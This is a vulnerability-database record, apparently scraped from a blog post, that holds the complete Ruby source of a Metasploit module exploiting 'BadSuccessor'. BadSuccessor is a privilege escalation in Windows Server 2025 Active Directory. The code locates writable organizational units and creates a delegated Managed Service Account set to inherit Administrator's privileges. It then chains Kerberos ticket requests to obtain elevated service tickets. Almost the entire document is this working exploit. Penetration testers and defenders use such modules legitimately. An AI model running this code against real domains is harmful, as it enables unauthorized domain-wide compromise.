{“lastseen”:”2026-01-15T19:28:01″,”description”:”This module exploits ‘Bad Successor’, which allows operators to elevate privileges on domain controllers running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service Accounts in this forest level and…”,”published”:”2026-01-15T18:57:50″,”modified”:”2026-01-15T18:57:50″,”type”:”metasploit”,”title”:”BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-LDAP-BAD_SUCCESSOR-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::LDAP\\n include Rex::Proto::LDAP\\n include Msf::OptionalSession::LDAP\\n include Msf::Exploit::Remote::LDAP::ActiveDirectory\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory’,\\n ‘Description’ =\\u003e %q{\\n This module exploits ‘Bad Successor’, which allows operators to elevate privileges on domain controllers\\n running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service\\n Accounts in this forest level and they came ripe for exploitation.\\n\\n Normal users can’t create dMSA accounts where dMSA accounts are supposed to be created, the Managed Service\\n Accounts OU, but if a normal user has write access to any other OU they can then create a dMSA account in\\n said OU. After creating the account the user can edit LDAP attributes of the account to indicate that this\\n account should inherit privileges from the Administrator user. Once this is complete we can request kerberos\\n tickets on behalf of the dMSA account and voila, you’re admin.\\n\\n The module has two actions, one for creating the dMSA account and setting it up to impersonate a high\\n privilege user, and another action for requesting the kerberos tickets needed to use the dMSA account for privilege\\n escalation.\\n },\\n ‘Author’ =\\u003e [\\n ‘AngelBoy’, # discovery\\n ‘Spencer McIntyre’, # Help with Kerberos implementation and a number of improvements during review\\n ‘jheysel-r7’ # module\\n ],\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/www.akamai.com\/blog\/security-research\/abusing-dmsa-for-privilege-escalation-in-active-directory?\\u0026vid=badsuccessor-demo-video’],\\n [ ‘URL’, ‘https:\/\/specterops.io\/blog\/2025\/05\/27\/understanding-mitigating-badsuccessor\/’],\\n [ ‘URL’, ‘https:\/\/jorgequestforknowledge.wordpress.com\/2025\/09\/02\/from-badsuccessor-to-patchedsuccessor\/’],\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Privileged’ =\\u003e true,\\n ‘DisclosureDate’ =\\u003e ‘2025-05-21’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SAFE ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘AKA’ =\\u003e [ ‘BadSuccessor’ ]\\n },\\n ‘Actions’ =\\u003e [\\n [ ‘CREATE_DMSA’, { ‘Description’ =\\u003e ‘Create a dMSA account which impersonates a high privilege user’ } ],\\n [ ‘GET_TICKET’, { ‘Description’ =\\u003e ‘Requests a series of tickets to give the user a ticket which can be used in the context of whomst the dMSA account impersonates’ } ],\\n ],\\n ‘DefaultAction’ =\\u003e ‘CREATE_DMSA’\\n )\\n )\\n register_options([\\n OptString.new(‘DMSA_ACCOUNT_NAME’, [true, ‘The name of the dMSA account to be create or request tickets for’]),\\n OptString.new(‘ACCOUNT_TO_IMPERSONATE’, [true, ‘The name of the dMSA account to be created’, ‘Administrator’], conditions: %w[ACTION == CREATE_DMSA]),\\n OptString.new(‘RHOSTNAME’, [true, ‘The hostname of the domain controller’], conditions: %w[ACTION == GET_TICKET]),\\n OptString.new(‘SERVICE’, [true, ‘The Service you wish to get a high privilege ticket for’, ‘cifs’], conditions: %w[ACTION == GET_TICKET]),\\n ])\\n deregister_options(‘SESSION’)\\n end\\n\\n def windows_version_vulnerable?\\n domain_info = adds_get_domain_info(@ldap)\\n version = domain_info[:domain_behavior_version]\\n\\n unless version.to_i == 10\\n print_error(‘This module only works against domains running at the Windows 2025 functional level.’)\\n return false\\n end\\n print_good(‘The domain is running at the Windows 2025 functional level, which is vulnerable to BadSuccessor.’)\\n true\\n end\\n\\n def validate\\n errors = {}\\n\\n case action.name\\n when ‘GET_TICKET’\\n if %w[auto ntlm].include?(datastore[‘LDAP::Auth’]) \\u0026\\u0026 Net::NTLM.is_ntlm_hash?(datastore[‘LDAPPassword’].encode(::Encoding::UTF_16LE))\\n errors[‘LDAPPassword’] = ‘The GET_TICKET action is incompatible with LDAP passwords that are NTLM hashes.’\\n end\\n end\\n\\n raise Msf::OptionValidateError, errors unless errors.empty?\\n end\\n\\n def check\\n ldap_connect do |ldap|\\n validate_bind_success!(ldap)\\n\\n if (@base_dn = datastore[‘BASE_DN’])\\n print_status(\\”User-specified base DN: #{@base_dn}\\”)\\n else\\n print_status(‘Discovering base DN automatically’)\\n\\n unless (@base_dn = ldap.base_dn)\\n print_warning(\\”Couldn’t discover base DN!\\”)\\n end\\n end\\n @ldap = ldap\\n\\n return Exploit::CheckCode::Safe unless windows_version_vulnerable?\\n\\n ous = get_ous_we_can_write_to\\n if ous.blank?\\n return Exploit::CheckCode::Safe(\\”Failed to find any Organizational Units #{datastore[‘LDAPUsername’]} can write to.\\”)\\n end\\n\\n print_good(\\”Found #{ous.length} OUs we can write to, listing below:\\”)\\n ous.each do |ou|\\n print_good(\\” – #{ou}\\”)\\n end\\n\\n Exploit::CheckCode::Appears\\n end\\n rescue Errno::ECONNRESET\\n fail_with(Failure::Disconnected, ‘The connection was reset.’)\\n rescue Rex::ConnectionError =\\u003e e\\n fail_with(Failure::Unreachable, e.message)\\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError =\\u003e e\\n fail_with(Failure::NoAccess, e.message)\\n rescue Net::LDAP::Error =\\u003e e\\n fail_with(Failure::Unknown, \\”#{e.class}: #{e.message}\\”)\\n end\\n\\n def get_ous_we_can_write_to\\n organizational_units = []\\n\\n filter = ‘(objectClass=organizationalUnit)’\\n attributes = [‘distinguishedName’, ‘name’, ‘objectClass’, ‘nTSecurityDescriptor’]\\n entries = query_ldap_server(filter, attributes)\\n entries.each do |entry|\\n if adds_obj_grants_permissions?(@ldap, entry, SecurityDescriptorMatcher::Allow.any(%i[WP]))\\n organizational_units \\u003c\\u003c entry[:dn].first\\n end\\n end\\n organizational_units\\n end\\n\\n def query_ldap_server(raw_filter, attributes, base_prefix: nil)\\n if base_prefix.blank?\\n full_base_dn = @base_dn.to_s\\n else\\n full_base_dn = \\”#{base_prefix},#{@base_dn}\\”\\n end\\n begin\\n filter = Net::LDAP::Filter.construct(raw_filter)\\n rescue StandardError =\\u003e e\\n fail_with(Failure::BadConfig, \\”Could not compile the filter! Error was #{e}\\”)\\n end\\n\\n # Set the value of LDAP_SERVER_SD_FLAGS_OID flag so everything but\\n # the SACL flag is set, as we need administrative privileges to retrieve\\n # the SACL from the ntSecurityDescriptor attribute on Windows AD LDAP servers.\\n\\n all_but_sacl_flag = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION\\n control_values = [all_but_sacl_flag].map(\\u0026:to_ber).to_ber_sequence.to_s.to_ber\\n controls = []\\n controls \\u003c\\u003c [LDAP_SERVER_SD_FLAGS_OID.to_ber, true.to_ber, control_values].to_ber_sequence\\n returned_entries = @ldap.search(base: full_base_dn, filter: filter, attributes: attributes, controls: controls)\\n query_result_table = @ldap.get_operation_result.table\\n validate_query_result!(query_result_table, filter)\\n returned_entries\\n end\\n\\n def create_dmsa(account_name, writeable_dn, group_membership)\\n sam_account_name = account_name\\n sam_account_name += ‘$’ unless sam_account_name.ends_with?(‘$’)\\n dn = \\”CN=#{account_name},#{writeable_dn}\\”\\n print_status(\\”Attempting to create dMSA account CN: #{account_name}, DN: #{dn}\\”)\\n\\n dmsa_attributes = {\\n ‘objectclass’ =\\u003e [‘top’, ‘person’, ‘organizationalPerson’, ‘user’, ‘computer’, ‘msDS-DelegatedManagedServiceAccount’],\\n ‘cn’ =\\u003e [account_name],\\n ‘useraccountcontrol’ =\\u003e [‘4096’],\\n ‘samaccountname’ =\\u003e [sam_account_name],\\n ‘dnshostname’ =\\u003e [\\”#{Faker::Name.first_name}.#{domain_dns_name}\\”],\\n ‘msds-supportedencryptiontypes’ =\\u003e [’28’],\\n ‘msds-managedpasswordinterval’ =\\u003e [’30’],\\n ‘msds-groupmsamembership’ =\\u003e [group_membership],\\n ‘msds-delegatedmsastate’ =\\u003e [‘0’],\\n ‘name’ =\\u003e [account_name]\\n }\\n\\n unless @ldap.add(dn: dn, attributes: dmsa_attributes)\\n\\n res = @ldap.get_operation_result\\n\\n case res.code\\n when Net::LDAP::ResultCodeInsufficientAccessRights\\n fail_with(Failure::BadConfig, ‘Insufficient access to create dMSA seed’)\\n when Net::LDAP::ResultCodeEntryAlreadyExists\\n fail_with(Failure::BadConfig, \\”Seed object #{account_name} already exists\\”)\\n when Net::LDAP::ResultCodeConstraintViolation\\n fail_with(Failure::UnexpectedReply, \\”Constraint violation: #{res.error_message}\\”)\\n else\\n fail_with(Failure::UnexpectedReply, \\”#{res.message}: #{res.error_message}\\”)\\n end\\n\\n return false\\n end\\n\\n print_good(\\”Created dMSA #{account_name}\\”)\\n true\\n end\\n\\n def set_dmsa_attributes(dn, delegated_state, preceded_by_link)\\n print_status(\\”Setting attributes for dMSA object: #{dn}\\”)\\n\\n # Define the attributes to update\\n operations = [\\n [:replace, ‘msds-delegatedmsastate’, [delegated_state]],\\n [:replace, ‘msds-managedaccountprecededbylink’, [preceded_by_link]]\\n ]\\n\\n # Perform the LDAP modify operation\\n unless @ldap.modify(dn: dn, operations: operations)\\n res = @ldap.get_operation_result\\n fail_with(Failure::Unknown, \\”Failed to update attributes for #{dn}: #{res.message} – #{res.error_message}\\”)\\n end\\n\\n print_good(\\”Successfully updated attributes for dMSA object: #{dn}\\”)\\n end\\n\\n def query_account(account_name)\\n account_name += ‘$’ unless account_name.ends_with?(‘$’)\\n entry = adds_get_object_by_samaccountname(@ldap, account_name)\\n\\n if entry.nil?\\n print_error(‘Original object not found’)\\n exit\\n end\\n\\n attrs_to_copy = {}\\n entry.each do |attr, values|\\n next unless %w[msds-managedaccountprecededbylink msds-delegatedmsastate].include?(attr.to_s)\\n\\n attrs_to_copy[attr.to_s] = values.map(\\u0026:to_s)\\n end\\n\\n attrs_to_copy.each do |key, value|\\n if value.is_a?(Array)\\n if value.length == 1\\n print_status(\\”#{key} =\\u003e #{value.first.inspect}\\”)\\n else\\n print_status(\\”#{key} =\\u003e [#{value.map(\\u0026:inspect).join(‘, ‘)}]\\”)\\n end\\n end\\n end\\n end\\n\\n def get_group_memebership(sid)\\n sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.from_sddl_text(\\n \\”O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;#{sid})\\”,\\n domain_sid: sid.rpartition(‘-‘).first\\n )\\n sd\\n end\\n\\n def domain_dns_name\\n return @domain_dns_name if @domain_dns_name\\n\\n if @ldap\\n @domain_dns_name = adds_get_domain_info(@ldap)[:dns_name]\\n else\\n ldap_connect { |ldap| @domain_dns_name = adds_get_domain_info(ldap)[:dns_name] }\\n end\\n\\n @domain_dns_name\\n end\\n\\n def action_create_dmsa\\n ldap_connect do |ldap|\\n validate_bind_success!(ldap)\\n if (@base_dn = datastore[‘BASE_DN’])\\n print_status(\\”User-specified base DN: #{@base_dn}\\”)\\n else\\n print_status(‘Discovering base DN automatically’)\\n\\n unless (@base_dn = ldap.base_dn)\\n fail_with(Failure::NotFound, \\”Couldn’t discover base DN!\\”)\\n end\\n end\\n\\n @ldap = ldap\\n currrent_user_info = adds_get_current_user(@ldap)\\n sid = Rex::Proto::MsDtyp::MsDtypSid.read(currrent_user_info[:objectsid].first)\\n\\n # Get vulnerable OUs\\n ous = get_ous_we_can_write_to\\n print_good(\\”Found #{ous.length} OUs we can write to, listing them below:\\”)\\n ous.each do |ou|\\n print_good(\\” – #{ou}\\”)\\n end\\n\\n writeable_dn = ous.sample\\n\\n create_dmsa(datastore[‘DMSA_ACCOUNT_NAME’], writeable_dn, get_group_memebership(sid).to_binary_s)\\n fail_with(Failure::NoTarget, ‘There are no Organization Units we can write to, the exploit can not continue’) if ous.empty?\\n set_dmsa_attributes(\\”CN=#{datastore[‘DMSA_ACCOUNT_NAME’]},#{writeable_dn}\\”, ‘2’, \\”CN=#{datastore[‘ACCOUNT_TO_IMPERSONATE’]},CN=Users,#{@base_dn}\\”)\\n query_account(datastore[‘DMSA_ACCOUNT_NAME’])\\n end\\n end\\n\\n def run_get_ticket_module(mod, opts = {})\\n opts.each do |key, value|\\n option_name = key.to_s\\n\\n if value == :unset\\n mod.datastore.unset(option_name)\\n else\\n mod.datastore[option_name] = value\\n end\\n end\\n\\n result = mod.run_simple(\\n ‘LocalInput’ =\\u003e user_input,\\n ‘LocalOutput’ =\\u003e user_output\\n )\\n\\n # Exceptions raised in the get_ticket won’t propagate here, so fail if the credential is nil\\n fail_with(Failure::Unknown, ‘Failed to run get_ticket module.’) unless result\\n\\n result[:credential]\\n end\\n\\n def action_get_ticket\\n mod_refname = ‘admin\/kerberos\/get_ticket’\\n\\n print_status(\\”Loading #{mod_refname}\\”)\\n get_ticket_module = framework.modules.create(mod_refname)\\n\\n unless get_ticket_module\\n print_error(\\”Failed to load module: #{mod_refname}\\”)\\n return\\n end\\n\\n # First get a TGT for the attacker who created the dmsa account:\\n user_tgt = auth_via_kdc\\n print_good(\\”Obtained TGT for the user #{datastore[‘LDAPUsername’]}\\”)\\n\\n # Secondly get a TGT for dMSA impersonating the target account:\\n impersonate = datastore[‘DMSA_ACCOUNT_NAME’]\\n impersonate += ‘$’ unless impersonate.ends_with?(‘$’)\\n get_dmsa_tgs_options = {\\n ‘DOMAIN’ =\\u003e domain_dns_name,\\n ‘PASSWORD’ =\\u003e datastore[‘LDAPPassword’],\\n ‘rhosts’ =\\u003e datastore[‘RHOST’],\\n ‘username’ =\\u003e datastore[‘LDAPUsername’],\\n ‘SPN’ =\\u003e \\”krbtgt\/#{domain_dns_name}\\”,\\n ‘action’ =\\u003e ‘get_tgs’,\\n ‘IMPERSONATE’ =\\u003e impersonate,\\n ‘IMPERSONATE_TYPE’ =\\u003e ‘dmsa’,\\n ‘krb5ccname’ =\\u003e user_tgt[:path]\\n }\\n\\n dmsa_credential = run_get_ticket_module(get_ticket_module, get_dmsa_tgs_options)\\n print_good(\\”Obtained TGT for dMSA #{datastore[‘DMSA_ACCOUNT_NAME’]}\\”)\\n\\n temp_ccache_file = Tempfile.create([‘bad_successor_’, ‘.ccache’], binmode: true)\\n begin\\n temp_ccache_file.write(dmsa_credential.to_ccache.encode)\\n temp_ccache_file.close\\n\\n # Lastly request the ticket for the desired service:\\n get_priv_esc_tgs_options = {\\n ‘username’ =\\u003e impersonate,\\n ‘SPN’ =\\u003e \\”#{datastore[‘SERVICE’]}\/#{datastore[‘RHOSTNAME’]}.#{domain_dns_name}\\”,\\n ‘action’ =\\u003e ‘get_tgs’,\\n ‘krb5ccname’ =\\u003e temp_ccache_file.path,\\n ‘PASSWORD’ =\\u003e :unset,\\n ‘IMPERSONATE’ =\\u003e :unset,\\n ‘IMPERSONATE_TYPE’ =\\u003e ‘none’\\n }\\n\\n run_get_ticket_module(get_ticket_module, get_priv_esc_tgs_options)\\n ensure\\n File.unlink(temp_ccache_file.path) if temp_ccache_file \\u0026\\u0026 File.exist?(temp_ccache_file.path)\\n end\\n\\n print_good(\\”Obtained elevated TGT for #{datastore[‘DMSA_ACCOUNT_NAME’]}\\”)\\n end\\n\\n def init_authenticator(options = {})\\n options.merge!({\\n host: rhost,\\n realm: domain_dns_name,\\n username: datastore[‘LDAPUsername’],\\n password: datastore[‘LDAPPassword’],\\n framework: framework,\\n framework_module: self\\n })\\n\\n Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(**options)\\n end\\n\\n def auth_via_kdc\\n authenticator = init_authenticator({ ticket_storage: kerberos_ticket_storage(read: false, write: true) })\\n authenticator.authenticate_via_kdc(options)\\n end\\n\\n def run\\n send(\\”action_#{action.name.downcase}\\”)\\n rescue Errno::ECONNRESET\\n fail_with(Failure::Disconnected, ‘The connection was reset.’)\\n rescue Rex::ConnectionError =\\u003e e\\n fail_with(Failure::Unreachable, e.message)\\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError =\\u003e e\\n fail_with(Failure::NoAccess, e.message)\\n rescue Net::LDAP::Error =\\u003e e\\n fail_with(Failure::Unknown, \\”#{e.class}: #{e.message}\\”)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/ldap\/bad_successor.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/ldap\/bad_successor\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-15T19:28:01″,”description”:”This module exploits ‘Bad Successor’, which allows operators to elevate privileges on domain controllers running at the Windows 2025 forest functional level. Microsoft decided to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-35891","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n